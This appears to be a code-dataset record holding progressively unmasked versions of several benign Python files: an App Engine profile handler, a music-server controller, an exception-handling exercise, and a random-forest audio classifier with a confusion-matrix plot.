"step-2": "<mask token>\n\n\nclass UserProfile(ndb.Model):\n \"\"\"Models the profile (JSON) of an individual user.\"\"\"\n profile = ndb.TextProperty()\n date = ndb.DateTimeProperty(auto_now_add=True)\n\n @classmethod\n def query_profile(cls, ancestor_key):\n return cls.query(ancestor=ancestor_key).get()\n\n\nclass UserProfileHandler(webapp2.RequestHandler):\n\n def get(self):\n template = JINJA_ENVIRONMENT.get_template('templates/profile.html')\n the_user = self.request.get('user')\n logging.info('The user = ' + the_user)\n if the_user == '':\n the_user = users.get_current_user().email()\n owner = True\n else:\n owner = False\n user_profile_data = UserProfile.get_by_id(the_user)\n template_values = {'owner': owner, 'user': the_user}\n if user_profile_data:\n template_values['profile_data'] = user_profile_data.profile\n logging.info(user_profile_data)\n self.response.out.write(template.render(template_values))\n\n def post(self):\n user = users.get_current_user()\n profile_data = self.request.get('profile_data')\n user_profile = UserProfile(id=user.email(), profile=profile_data)\n user_profile.put()\n self.redirect('/profile')\n\n\n<mask token>\n",
"step-3": "<mask token>\nJINJA_ENVIRONMENT = jinja2.Environment(loader=jinja2.FileSystemLoader(os.\n path.dirname(__file__)), extensions=['jinja2.ext.autoescape'],\n autoescape=True)\n\n\nclass UserProfile(ndb.Model):\n \"\"\"Models the profile (JSON) of an individual user.\"\"\"\n profile = ndb.TextProperty()\n date = ndb.DateTimeProperty(auto_now_add=True)\n\n @classmethod\n def query_profile(cls, ancestor_key):\n return cls.query(ancestor=ancestor_key).get()\n\n\nclass UserProfileHandler(webapp2.RequestHandler):\n\n def get(self):\n template = JINJA_ENVIRONMENT.get_template('templates/profile.html')\n the_user = self.request.get('user')\n logging.info('The user = ' + the_user)\n if the_user == '':\n the_user = users.get_current_user().email()\n owner = True\n else:\n owner = False\n user_profile_data = UserProfile.get_by_id(the_user)\n template_values = {'owner': owner, 'user': the_user}\n if user_profile_data:\n template_values['profile_data'] = user_profile_data.profile\n logging.info(user_profile_data)\n self.response.out.write(template.render(template_values))\n\n def post(self):\n user = users.get_current_user()\n profile_data = self.request.get('profile_data')\n user_profile = UserProfile(id=user.email(), profile=profile_data)\n user_profile.put()\n self.redirect('/profile')\n\n\napp = webapp2.WSGIApplication([('/profile', UserProfileHandler)], debug=True)\n",
"step-4": "from google.appengine.api import users\nfrom google.appengine.ext import ndb\nfrom datetime import datetime\nfrom datetime import timedelta\nimport os\nimport logging\nimport webapp2\nimport jinja2\nJINJA_ENVIRONMENT = jinja2.Environment(loader=jinja2.FileSystemLoader(os.\n path.dirname(__file__)), extensions=['jinja2.ext.autoescape'],\n autoescape=True)\n\n\nclass UserProfile(ndb.Model):\n \"\"\"Models the profile (JSON) of an individual user.\"\"\"\n profile = ndb.TextProperty()\n date = ndb.DateTimeProperty(auto_now_add=True)\n\n @classmethod\n def query_profile(cls, ancestor_key):\n return cls.query(ancestor=ancestor_key).get()\n\n\nclass UserProfileHandler(webapp2.RequestHandler):\n\n def get(self):\n template = JINJA_ENVIRONMENT.get_template('templates/profile.html')\n the_user = self.request.get('user')\n logging.info('The user = ' + the_user)\n if the_user == '':\n the_user = users.get_current_user().email()\n owner = True\n else:\n owner = False\n user_profile_data = UserProfile.get_by_id(the_user)\n template_values = {'owner': owner, 'user': the_user}\n if user_profile_data:\n template_values['profile_data'] = user_profile_data.profile\n logging.info(user_profile_data)\n self.response.out.write(template.render(template_values))\n\n def post(self):\n user = users.get_current_user()\n profile_data = self.request.get('profile_data')\n user_profile = UserProfile(id=user.email(), profile=profile_data)\n user_profile.put()\n self.redirect('/profile')\n\n\napp = webapp2.WSGIApplication([('/profile', UserProfileHandler)], debug=True)\n",
"step-5": "from google.appengine.api import users\nfrom google.appengine.ext import ndb\nfrom datetime import datetime\nfrom datetime import timedelta\nimport os\nimport logging\n\nimport webapp2\nimport jinja2\n\nJINJA_ENVIRONMENT = jinja2.Environment(\n loader=jinja2.FileSystemLoader(os.path.dirname(__file__)),\n extensions=['jinja2.ext.autoescape'],\n autoescape=True)\n\nclass UserProfile(ndb.Model):\n \"\"\"Models the profile (JSON) of an individual user.\"\"\"\n profile = ndb.TextProperty()\n date = ndb.DateTimeProperty(auto_now_add=True)\n\n @classmethod\n def query_profile(cls, ancestor_key):\n return cls.query(ancestor=ancestor_key).get()\n\nclass UserProfileHandler(webapp2.RequestHandler):\n def get(self):\n template = JINJA_ENVIRONMENT.get_template('templates/profile.html')\n the_user = self.request.get('user')\n logging.info(\"The user = \" + the_user)\n if the_user == \"\":\n the_user = users.get_current_user().email()\n owner = True\n else:\n owner = False\n user_profile_data = UserProfile.get_by_id(the_user)\n template_values = { 'owner': owner, 'user': the_user}\n if user_profile_data:\n template_values['profile_data'] = user_profile_data.profile\n logging.info(user_profile_data)\n self.response.out.write(template.render(template_values))\n\n def post(self):\n user = users.get_current_user()\n profile_data = self.request.get('profile_data')\n user_profile = UserProfile(id=user.email(), profile=profile_data)\n user_profile.put()\n self.redirect('/profile')\n #self.response.out.write(\"Here is the JSON for your profile.\")\n #self.response.out.write(profile_data)\n\napp = webapp2.WSGIApplication([\n ('/profile', UserProfileHandler),\n], debug=True)\n",
"step-ids": [
5,
7,
8,
9,
10
]
}
|
[
5,
7,
8,
9,
10
] |
<|reserved_special_token_0|>
class ControllerSC:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
@staticmethod
def entrarSC(login, senha):
resultado = Usuario.entrar(login, senha)
return resultado
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ControllerSC:
<|reserved_special_token_0|>
def __init__(self):
pass
@staticmethod
def entrarSC(login, senha):
resultado = Usuario.entrar(login, senha)
return resultado
@staticmethod
def cadastrarSC(usuario):
Usuario.adicionar(usuario)
@staticmethod
def criarPlaylist(dicioPlaylist):
musicas = Playlist.criarPlaylist(dicioPlaylist)
minhasMusicas = json.dumps(musicas.encode())
return minhasMusicas
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ControllerSC:
"""
O controlador define 2 ações:
- adicionar_pessoa: para adicionar novas pessoas no banco de
dados.
- listar_pessoas: retornar a lista das pessoas
Note que as 2 ações supracitadas utilizam a classe do Modelo para
consultar/atualizar o banco de dados
"""
def __init__(self):
pass
@staticmethod
def entrarSC(login, senha):
resultado = Usuario.entrar(login, senha)
return resultado
@staticmethod
def cadastrarSC(usuario):
Usuario.adicionar(usuario)
@staticmethod
def criarPlaylist(dicioPlaylist):
musicas = Playlist.criarPlaylist(dicioPlaylist)
minhasMusicas = json.dumps(musicas.encode())
return minhasMusicas
<|reserved_special_token_1|>
from usuarioModel import *
class ControllerSC:
"""
O controlador define 2 ações:
- adicionar_pessoa: para adicionar novas pessoas no banco de
dados.
- listar_pessoas: retornar a lista das pessoas
Note que as 2 ações supracitadas utilizam a classe do Modelo para
consultar/atualizar o banco de dados
"""
def __init__(self):
pass
@staticmethod
def entrarSC(login, senha):
resultado = Usuario.entrar(login, senha)
return resultado
@staticmethod
def cadastrarSC(usuario):
Usuario.adicionar(usuario)
@staticmethod
def criarPlaylist(dicioPlaylist):
musicas = Playlist.criarPlaylist(dicioPlaylist)
minhasMusicas = json.dumps(musicas.encode())
return minhasMusicas
<|reserved_special_token_1|>
#Classe do controlador do servidor SEEEEEEERVIDOOOOOOOOOOR
from usuarioModel import *
class ControllerSC:
'''
O controlador define 2 ações:
- adicionar_pessoa: para adicionar novas pessoas no banco de
dados.
- listar_pessoas: retornar a lista das pessoas
Note que as 2 ações supracitadas utilizam a classe do Modelo para
consultar/atualizar o banco de dados
'''
def __init__(self):
pass
@staticmethod
def entrarSC(login, senha):
resultado = Usuario.entrar(login, senha)
return resultado
@staticmethod
def cadastrarSC(usuario):
Usuario.adicionar(usuario)
@staticmethod
def criarPlaylist(dicioPlaylist):
musicas = Playlist.criarPlaylist(dicioPlaylist)
minhasMusicas = json.dumps(musicas.encode())
return minhasMusicas
|
flexible
|
{
"blob_id": "39eecf1c7ec19f7c75721caa092c08569f53d3e5",
"index": 9449,
"step-1": "<mask token>\n\n\nclass ControllerSC:\n <mask token>\n <mask token>\n\n @staticmethod\n def entrarSC(login, senha):\n resultado = Usuario.entrar(login, senha)\n return resultado\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass ControllerSC:\n <mask token>\n\n def __init__(self):\n pass\n\n @staticmethod\n def entrarSC(login, senha):\n resultado = Usuario.entrar(login, senha)\n return resultado\n\n @staticmethod\n def cadastrarSC(usuario):\n Usuario.adicionar(usuario)\n\n @staticmethod\n def criarPlaylist(dicioPlaylist):\n musicas = Playlist.criarPlaylist(dicioPlaylist)\n minhasMusicas = json.dumps(musicas.encode())\n return minhasMusicas\n",
"step-3": "<mask token>\n\n\nclass ControllerSC:\n \"\"\"\n O controlador define 2 ações:\n - adicionar_pessoa: para adicionar novas pessoas no banco de\n dados. \n - listar_pessoas: retornar a lista das pessoas\n\n Note que as 2 ações supracitadas utilizam a classe do Modelo para\n consultar/atualizar o banco de dados\n \"\"\"\n\n def __init__(self):\n pass\n\n @staticmethod\n def entrarSC(login, senha):\n resultado = Usuario.entrar(login, senha)\n return resultado\n\n @staticmethod\n def cadastrarSC(usuario):\n Usuario.adicionar(usuario)\n\n @staticmethod\n def criarPlaylist(dicioPlaylist):\n musicas = Playlist.criarPlaylist(dicioPlaylist)\n minhasMusicas = json.dumps(musicas.encode())\n return minhasMusicas\n",
"step-4": "from usuarioModel import *\n\n\nclass ControllerSC:\n \"\"\"\n O controlador define 2 ações:\n - adicionar_pessoa: para adicionar novas pessoas no banco de\n dados. \n - listar_pessoas: retornar a lista das pessoas\n\n Note que as 2 ações supracitadas utilizam a classe do Modelo para\n consultar/atualizar o banco de dados\n \"\"\"\n\n def __init__(self):\n pass\n\n @staticmethod\n def entrarSC(login, senha):\n resultado = Usuario.entrar(login, senha)\n return resultado\n\n @staticmethod\n def cadastrarSC(usuario):\n Usuario.adicionar(usuario)\n\n @staticmethod\n def criarPlaylist(dicioPlaylist):\n musicas = Playlist.criarPlaylist(dicioPlaylist)\n minhasMusicas = json.dumps(musicas.encode())\n return minhasMusicas\n",
"step-5": "#Classe do controlador do servidor SEEEEEEERVIDOOOOOOOOOOR\n\nfrom usuarioModel import *\n\n\nclass ControllerSC:\n '''\n O controlador define 2 ações:\n - adicionar_pessoa: para adicionar novas pessoas no banco de\n dados. \n - listar_pessoas: retornar a lista das pessoas\n\n Note que as 2 ações supracitadas utilizam a classe do Modelo para\n consultar/atualizar o banco de dados\n '''\n\n def __init__(self):\n pass\n \n @staticmethod\n def entrarSC(login, senha):\n resultado = Usuario.entrar(login, senha)\n return resultado\n\n @staticmethod\n def cadastrarSC(usuario):\n Usuario.adicionar(usuario)\n\n @staticmethod\n def criarPlaylist(dicioPlaylist):\n \n musicas = Playlist.criarPlaylist(dicioPlaylist)\n minhasMusicas = json.dumps(musicas.encode())\n return minhasMusicas\n ",
"step-ids": [
2,
5,
6,
7,
8
]
}
|
[
2,
5,
6,
7,
8
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
try:
print(l)
s = len(l)
if s > 5:
raise TypeError
print(d[2])
except TypeError:
print('Error!!!length should be less than or equals to 5')
except NameError:
print('index out of range')
else:
for i in l:
print(i)
finally:
print('execution done!!!!!!')
<|reserved_special_token_1|>
l = {1, 2, 3, 4}
try:
print(l)
s = len(l)
if s > 5:
raise TypeError
print(d[2])
except TypeError:
print('Error!!!length should be less than or equals to 5')
except NameError:
print('index out of range')
else:
for i in l:
print(i)
finally:
print('execution done!!!!!!')
<|reserved_special_token_1|>
l={1,2,3,4}
try:
print(l)
s=len(l)
if s>5:
raise TypeError
print(d[2])
except TypeError:
print("Error!!!length should be less than or equals to 5")
except NameError:
print("index out of range")
else:
for i in l:
print(i)
finally:
print("execution done!!!!!!")
|
flexible
|
{
"blob_id": "e59e60b0a4b7deca9c510bd6b9c58636c6d34c80",
"index": 1027,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ntry:\n print(l)\n s = len(l)\n if s > 5:\n raise TypeError\n print(d[2])\nexcept TypeError:\n print('Error!!!length should be less than or equals to 5')\nexcept NameError:\n print('index out of range')\nelse:\n for i in l:\n print(i)\nfinally:\n print('execution done!!!!!!')\n",
"step-3": "l = {1, 2, 3, 4}\ntry:\n print(l)\n s = len(l)\n if s > 5:\n raise TypeError\n print(d[2])\nexcept TypeError:\n print('Error!!!length should be less than or equals to 5')\nexcept NameError:\n print('index out of range')\nelse:\n for i in l:\n print(i)\nfinally:\n print('execution done!!!!!!')\n",
"step-4": "\nl={1,2,3,4}\ntry:\n\tprint(l)\n\ts=len(l)\n\tif s>5:\n\t\traise TypeError\n\tprint(d[2])\n\nexcept TypeError:\n\tprint(\"Error!!!length should be less than or equals to 5\")\nexcept NameError:\n\tprint(\"index out of range\")\nelse:\n\tfor i in l:\n\t\tprint(i)\nfinally:\n\tprint(\"execution done!!!!!!\")",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
def main():
data_set = pandas.read_csv('dataset.csv', index_col=False, encoding='gbk')
print('数据集的shape:', data_set.shape)
dnumpy_x, dnumpy_y = TrainTestProcesser.split_dframe_x_y(data_set)
folds = TrainTestProcesser.split_dnumpy_train_test(dnumpy_x, dnumpy_y)
model = RandomForestClassifier(n_estimators=23)
TrainTestProcesser.apply_SKfold(model, folds)
TrainTestProcesser.train_model(model, dnumpy_x, dnumpy_y)
joblib.dump(model, 'RFC_model.plk')
def getconfusion_matrix():
mp.rcParams['font.family'] = ['sans-serif']
mp.rcParams['font.sans-serif'] = ['SimHei']
classes = get_subdir('音频文件')
data_set = pandas.read_csv('dataset.csv', index_col=False, encoding='gbk')
dnumpy_x, dnumpy_y = TrainTestProcesser.split_dframe_x_y(data_set)
train_x, test_x, train_y, test_y = ms.train_test_split(dnumpy_x,
dnumpy_y, test_size=0.25, random_state=7)
model = joblib.load('RFC_model.plk')
pred_test_y = model.predict(test_x)
cm = confusion_matrix(test_y, pred_test_y)
r = classification_report(test_y, pred_test_y)
print('分类报告为:', r, sep='\n')
mp.figure()
plot_confusion_matrix(cm, classes=classes, normalize=True, title=
'随机森林分类器混淆矩阵')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def main():
data_set = pandas.read_csv('dataset.csv', index_col=False, encoding='gbk')
print('数据集的shape:', data_set.shape)
dnumpy_x, dnumpy_y = TrainTestProcesser.split_dframe_x_y(data_set)
folds = TrainTestProcesser.split_dnumpy_train_test(dnumpy_x, dnumpy_y)
model = RandomForestClassifier(n_estimators=23)
TrainTestProcesser.apply_SKfold(model, folds)
TrainTestProcesser.train_model(model, dnumpy_x, dnumpy_y)
joblib.dump(model, 'RFC_model.plk')
def getconfusion_matrix():
mp.rcParams['font.family'] = ['sans-serif']
mp.rcParams['font.sans-serif'] = ['SimHei']
classes = get_subdir('音频文件')
data_set = pandas.read_csv('dataset.csv', index_col=False, encoding='gbk')
dnumpy_x, dnumpy_y = TrainTestProcesser.split_dframe_x_y(data_set)
train_x, test_x, train_y, test_y = ms.train_test_split(dnumpy_x,
dnumpy_y, test_size=0.25, random_state=7)
model = joblib.load('RFC_model.plk')
pred_test_y = model.predict(test_x)
cm = confusion_matrix(test_y, pred_test_y)
r = classification_report(test_y, pred_test_y)
print('分类报告为:', r, sep='\n')
mp.figure()
plot_confusion_matrix(cm, classes=classes, normalize=True, title=
'随机森林分类器混淆矩阵')
def plot_confusion_matrix(cm, classes, normalize=False, title=
'Confusion matrix', cmap=mp.cm.Blues):
if normalize:
cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
print('混淆矩阵归一化')
else:
print('混淆矩阵未归一化')
print('混淆矩阵为:', cm)
mp.imshow(cm, interpolation='nearest', cmap=cmap)
mp.title(title)
mp.colorbar()
tick_marks = np.arange(len(classes))
mp.xticks(tick_marks, classes, rotation=45)
mp.yticks(tick_marks, classes)
fmt = '.2f' if normalize else 'd'
thresh = cm.max() / 2.0
for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):
mp.text(j, i, format(cm[i, j], fmt), horizontalalignment='center',
color='white' if cm[i, j] > thresh else 'black')
mp.tight_layout()
mp.ylabel('True label')
mp.xlabel('Predicted label')
mp.savefig('confusion_matrix_RFC.png', format='png')
mp.show()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def main():
data_set = pandas.read_csv('dataset.csv', index_col=False, encoding='gbk')
print('数据集的shape:', data_set.shape)
dnumpy_x, dnumpy_y = TrainTestProcesser.split_dframe_x_y(data_set)
folds = TrainTestProcesser.split_dnumpy_train_test(dnumpy_x, dnumpy_y)
model = RandomForestClassifier(n_estimators=23)
TrainTestProcesser.apply_SKfold(model, folds)
TrainTestProcesser.train_model(model, dnumpy_x, dnumpy_y)
joblib.dump(model, 'RFC_model.plk')
def getconfusion_matrix():
mp.rcParams['font.family'] = ['sans-serif']
mp.rcParams['font.sans-serif'] = ['SimHei']
classes = get_subdir('音频文件')
data_set = pandas.read_csv('dataset.csv', index_col=False, encoding='gbk')
dnumpy_x, dnumpy_y = TrainTestProcesser.split_dframe_x_y(data_set)
train_x, test_x, train_y, test_y = ms.train_test_split(dnumpy_x,
dnumpy_y, test_size=0.25, random_state=7)
model = joblib.load('RFC_model.plk')
pred_test_y = model.predict(test_x)
cm = confusion_matrix(test_y, pred_test_y)
r = classification_report(test_y, pred_test_y)
print('分类报告为:', r, sep='\n')
mp.figure()
plot_confusion_matrix(cm, classes=classes, normalize=True, title=
'随机森林分类器混淆矩阵')
def plot_confusion_matrix(cm, classes, normalize=False, title=
'Confusion matrix', cmap=mp.cm.Blues):
if normalize:
cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
print('混淆矩阵归一化')
else:
print('混淆矩阵未归一化')
print('混淆矩阵为:', cm)
mp.imshow(cm, interpolation='nearest', cmap=cmap)
mp.title(title)
mp.colorbar()
tick_marks = np.arange(len(classes))
mp.xticks(tick_marks, classes, rotation=45)
mp.yticks(tick_marks, classes)
fmt = '.2f' if normalize else 'd'
thresh = cm.max() / 2.0
for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):
mp.text(j, i, format(cm[i, j], fmt), horizontalalignment='center',
color='white' if cm[i, j] > thresh else 'black')
mp.tight_layout()
mp.ylabel('True label')
mp.xlabel('Predicted label')
mp.savefig('confusion_matrix_RFC.png', format='png')
mp.show()
if __name__ == '__main__':
main()
getconfusion_matrix()
<|reserved_special_token_1|>
import pandas
from sklearn.externals import joblib
import TrainTestProcesser
from sklearn.ensemble import RandomForestClassifier
from Select_OF_File import get_subdir
import matplotlib.pyplot as mp
import sklearn.model_selection as ms
from sklearn.metrics import confusion_matrix
from sklearn.metrics import classification_report
import numpy as np
import itertools
def main():
data_set = pandas.read_csv('dataset.csv', index_col=False, encoding='gbk')
print('数据集的shape:', data_set.shape)
dnumpy_x, dnumpy_y = TrainTestProcesser.split_dframe_x_y(data_set)
folds = TrainTestProcesser.split_dnumpy_train_test(dnumpy_x, dnumpy_y)
model = RandomForestClassifier(n_estimators=23)
TrainTestProcesser.apply_SKfold(model, folds)
TrainTestProcesser.train_model(model, dnumpy_x, dnumpy_y)
joblib.dump(model, 'RFC_model.plk')
def getconfusion_matrix():
mp.rcParams['font.family'] = ['sans-serif']
mp.rcParams['font.sans-serif'] = ['SimHei']
classes = get_subdir('音频文件')
data_set = pandas.read_csv('dataset.csv', index_col=False, encoding='gbk')
dnumpy_x, dnumpy_y = TrainTestProcesser.split_dframe_x_y(data_set)
train_x, test_x, train_y, test_y = ms.train_test_split(dnumpy_x,
dnumpy_y, test_size=0.25, random_state=7)
model = joblib.load('RFC_model.plk')
pred_test_y = model.predict(test_x)
cm = confusion_matrix(test_y, pred_test_y)
r = classification_report(test_y, pred_test_y)
print('分类报告为:', r, sep='\n')
mp.figure()
plot_confusion_matrix(cm, classes=classes, normalize=True, title=
'随机森林分类器混淆矩阵')
def plot_confusion_matrix(cm, classes, normalize=False, title=
'Confusion matrix', cmap=mp.cm.Blues):
if normalize:
cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
print('混淆矩阵归一化')
else:
print('混淆矩阵未归一化')
print('混淆矩阵为:', cm)
mp.imshow(cm, interpolation='nearest', cmap=cmap)
mp.title(title)
mp.colorbar()
tick_marks = np.arange(len(classes))
mp.xticks(tick_marks, classes, rotation=45)
mp.yticks(tick_marks, classes)
fmt = '.2f' if normalize else 'd'
thresh = cm.max() / 2.0
for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):
mp.text(j, i, format(cm[i, j], fmt), horizontalalignment='center',
color='white' if cm[i, j] > thresh else 'black')
mp.tight_layout()
mp.ylabel('True label')
mp.xlabel('Predicted label')
mp.savefig('confusion_matrix_RFC.png', format='png')
mp.show()
if __name__ == '__main__':
main()
getconfusion_matrix()
<|reserved_special_token_1|>
import pandas
from sklearn.externals import joblib
import TrainTestProcesser
from sklearn.ensemble import RandomForestClassifier
from Select_OF_File import get_subdir
import matplotlib.pyplot as mp
import sklearn.model_selection as ms
from sklearn.metrics import confusion_matrix
from sklearn.metrics import classification_report
import numpy as np
import itertools
def main():
#获取数据集
#不使用第一列作为行索引
data_set = pandas.read_csv("dataset.csv",index_col=False,encoding='gbk')
print("数据集的shape:",data_set.shape)
#将数据集分为特征x和标签y
dnumpy_x,dnumpy_y = TrainTestProcesser.split_dframe_x_y(data_set)
#使用StratifiedKFold将数据集分为训练集和测试集
folds= TrainTestProcesser.split_dnumpy_train_test(dnumpy_x, dnumpy_y)
#创建模型
model=RandomForestClassifier(n_estimators=23)
#使用kfol交叉验证
TrainTestProcesser.apply_SKfold(model, folds)
#训练模型
TrainTestProcesser.train_model(model, dnumpy_x, dnumpy_y)
#保存模型以备将来使用
joblib.dump(model,"RFC_model.plk")
def getconfusion_matrix():
mp.rcParams['font.family'] = ['sans-serif']
mp.rcParams['font.sans-serif'] = ['SimHei']
classes=get_subdir("音频文件")
data_set = pandas.read_csv("dataset.csv",index_col=False,encoding='gbk')
dnumpy_x, dnumpy_y = TrainTestProcesser.split_dframe_x_y(data_set)
train_x, test_x, train_y, test_y = ms.train_test_split(dnumpy_x, dnumpy_y, test_size=0.25, random_state=7)
model=joblib.load("RFC_model.plk")
pred_test_y = model.predict(test_x)
#混淆矩阵
cm=confusion_matrix(test_y, pred_test_y)
# 获取分类报告
r = classification_report(test_y, pred_test_y)
print('分类报告为:', r, sep='\n')
mp.figure()
plot_confusion_matrix(cm, classes=classes, normalize=True,
title='随机森林分类器混淆矩阵')
def plot_confusion_matrix(cm, classes,normalize=False,title='Confusion matrix',
cmap=mp.cm.Blues):
if normalize:
cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
print("混淆矩阵归一化")
else:
print('混淆矩阵未归一化')
print("混淆矩阵为:",cm)
mp.imshow(cm, interpolation='nearest', cmap=cmap)
mp.title(title)
mp.colorbar()
tick_marks = np.arange(len(classes))
mp.xticks(tick_marks, classes, rotation=45)
mp.yticks(tick_marks, classes)
fmt = '.2f' if normalize else 'd'
thresh = cm.max() / 2.
for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):
mp.text(j, i, format(cm[i, j], fmt),
horizontalalignment="center",
color="white" if cm[i, j] > thresh else "black")
mp.tight_layout()
mp.ylabel('True label')
mp.xlabel('Predicted label')
mp.savefig('confusion_matrix_RFC.png', format='png')
mp.show()
if __name__ == "__main__":
main()
getconfusion_matrix()
|
flexible
|
{
"blob_id": "b0bc55ab05d49605e2f42ea036f8405727c468d2",
"index": 3504,
"step-1": "<mask token>\n\n\ndef main():\n data_set = pandas.read_csv('dataset.csv', index_col=False, encoding='gbk')\n print('数据集的shape:', data_set.shape)\n dnumpy_x, dnumpy_y = TrainTestProcesser.split_dframe_x_y(data_set)\n folds = TrainTestProcesser.split_dnumpy_train_test(dnumpy_x, dnumpy_y)\n model = RandomForestClassifier(n_estimators=23)\n TrainTestProcesser.apply_SKfold(model, folds)\n TrainTestProcesser.train_model(model, dnumpy_x, dnumpy_y)\n joblib.dump(model, 'RFC_model.plk')\n\n\ndef getconfusion_matrix():\n mp.rcParams['font.family'] = ['sans-serif']\n mp.rcParams['font.sans-serif'] = ['SimHei']\n classes = get_subdir('音频文件')\n data_set = pandas.read_csv('dataset.csv', index_col=False, encoding='gbk')\n dnumpy_x, dnumpy_y = TrainTestProcesser.split_dframe_x_y(data_set)\n train_x, test_x, train_y, test_y = ms.train_test_split(dnumpy_x,\n dnumpy_y, test_size=0.25, random_state=7)\n model = joblib.load('RFC_model.plk')\n pred_test_y = model.predict(test_x)\n cm = confusion_matrix(test_y, pred_test_y)\n r = classification_report(test_y, pred_test_y)\n print('分类报告为:', r, sep='\\n')\n mp.figure()\n plot_confusion_matrix(cm, classes=classes, normalize=True, title=\n '随机森林分类器混淆矩阵')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef main():\n data_set = pandas.read_csv('dataset.csv', index_col=False, encoding='gbk')\n print('数据集的shape:', data_set.shape)\n dnumpy_x, dnumpy_y = TrainTestProcesser.split_dframe_x_y(data_set)\n folds = TrainTestProcesser.split_dnumpy_train_test(dnumpy_x, dnumpy_y)\n model = RandomForestClassifier(n_estimators=23)\n TrainTestProcesser.apply_SKfold(model, folds)\n TrainTestProcesser.train_model(model, dnumpy_x, dnumpy_y)\n joblib.dump(model, 'RFC_model.plk')\n\n\ndef getconfusion_matrix():\n mp.rcParams['font.family'] = ['sans-serif']\n mp.rcParams['font.sans-serif'] = ['SimHei']\n classes = get_subdir('音频文件')\n data_set = pandas.read_csv('dataset.csv', index_col=False, encoding='gbk')\n dnumpy_x, dnumpy_y = TrainTestProcesser.split_dframe_x_y(data_set)\n train_x, test_x, train_y, test_y = ms.train_test_split(dnumpy_x,\n dnumpy_y, test_size=0.25, random_state=7)\n model = joblib.load('RFC_model.plk')\n pred_test_y = model.predict(test_x)\n cm = confusion_matrix(test_y, pred_test_y)\n r = classification_report(test_y, pred_test_y)\n print('分类报告为:', r, sep='\\n')\n mp.figure()\n plot_confusion_matrix(cm, classes=classes, normalize=True, title=\n '随机森林分类器混淆矩阵')\n\n\ndef plot_confusion_matrix(cm, classes, normalize=False, title=\n 'Confusion matrix', cmap=mp.cm.Blues):\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n print('混淆矩阵归一化')\n else:\n print('混淆矩阵未归一化')\n print('混淆矩阵为:', cm)\n mp.imshow(cm, interpolation='nearest', cmap=cmap)\n mp.title(title)\n mp.colorbar()\n tick_marks = np.arange(len(classes))\n mp.xticks(tick_marks, classes, rotation=45)\n mp.yticks(tick_marks, classes)\n fmt = '.2f' if normalize else 'd'\n thresh = cm.max() / 2.0\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n mp.text(j, i, format(cm[i, j], fmt), horizontalalignment='center',\n color='white' if cm[i, j] > thresh else 'black')\n mp.tight_layout()\n mp.ylabel('True label')\n mp.xlabel('Predicted label')\n mp.savefig('confusion_matrix_RFC.png', format='png')\n mp.show()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef main():\n data_set = pandas.read_csv('dataset.csv', index_col=False, encoding='gbk')\n print('数据集的shape:', data_set.shape)\n dnumpy_x, dnumpy_y = TrainTestProcesser.split_dframe_x_y(data_set)\n folds = TrainTestProcesser.split_dnumpy_train_test(dnumpy_x, dnumpy_y)\n model = RandomForestClassifier(n_estimators=23)\n TrainTestProcesser.apply_SKfold(model, folds)\n TrainTestProcesser.train_model(model, dnumpy_x, dnumpy_y)\n joblib.dump(model, 'RFC_model.plk')\n\n\ndef getconfusion_matrix():\n mp.rcParams['font.family'] = ['sans-serif']\n mp.rcParams['font.sans-serif'] = ['SimHei']\n classes = get_subdir('音频文件')\n data_set = pandas.read_csv('dataset.csv', index_col=False, encoding='gbk')\n dnumpy_x, dnumpy_y = TrainTestProcesser.split_dframe_x_y(data_set)\n train_x, test_x, train_y, test_y = ms.train_test_split(dnumpy_x,\n dnumpy_y, test_size=0.25, random_state=7)\n model = joblib.load('RFC_model.plk')\n pred_test_y = model.predict(test_x)\n cm = confusion_matrix(test_y, pred_test_y)\n r = classification_report(test_y, pred_test_y)\n print('分类报告为:', r, sep='\\n')\n mp.figure()\n plot_confusion_matrix(cm, classes=classes, normalize=True, title=\n '随机森林分类器混淆矩阵')\n\n\ndef plot_confusion_matrix(cm, classes, normalize=False, title=\n 'Confusion matrix', cmap=mp.cm.Blues):\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n print('混淆矩阵归一化')\n else:\n print('混淆矩阵未归一化')\n print('混淆矩阵为:', cm)\n mp.imshow(cm, interpolation='nearest', cmap=cmap)\n mp.title(title)\n mp.colorbar()\n tick_marks = np.arange(len(classes))\n mp.xticks(tick_marks, classes, rotation=45)\n mp.yticks(tick_marks, classes)\n fmt = '.2f' if normalize else 'd'\n thresh = cm.max() / 2.0\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n mp.text(j, i, format(cm[i, j], fmt), horizontalalignment='center',\n color='white' if cm[i, j] > thresh else 'black')\n mp.tight_layout()\n mp.ylabel('True label')\n mp.xlabel('Predicted label')\n mp.savefig('confusion_matrix_RFC.png', format='png')\n mp.show()\n\n\nif __name__ == '__main__':\n main()\n getconfusion_matrix()\n",
